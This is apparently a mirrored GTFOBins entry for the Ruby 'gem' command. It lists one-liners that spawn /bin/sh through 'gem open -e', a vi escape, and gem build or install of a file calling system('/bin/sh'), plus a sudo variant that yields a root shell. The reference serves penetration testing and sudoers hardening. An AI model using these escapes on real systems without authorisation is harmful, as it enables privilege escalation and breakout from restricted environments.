1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/gem.md
2020-03-14 13:08:13 +01:00

24 lines
1013 B
Markdown

---
functions:
shell:
- description: This requires the name of an installed gem to be provided (`rdoc` is usually installed).
code: gem open -e "/bin/sh -c /bin/sh" rdoc
- description: This invokes the default editor, which is likely to be [`vi`](/gtfobins/vi/), other functions may apply. This requires the name of an installed gem to be provided (`rdoc` is usually installed).
code: |
gem open rdoc
:!/bin/sh
- description: This executes the specified file as [`ruby`](/gtfobins/ruby/) code.
code: |
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/x
gem build $TF/x
- description: This executes the specified file as [`ruby`](/gtfobins/ruby/) code.
code: |
TF=$(mktemp -d)
echo 'system("/bin/sh")' > $TF/x
gem install --file $TF/x
sudo:
- description: This requires the name of an installed gem to be provided (`rdoc` is usually installed).
code: sudo gem open -e "/bin/sh -c /bin/sh" rdoc
---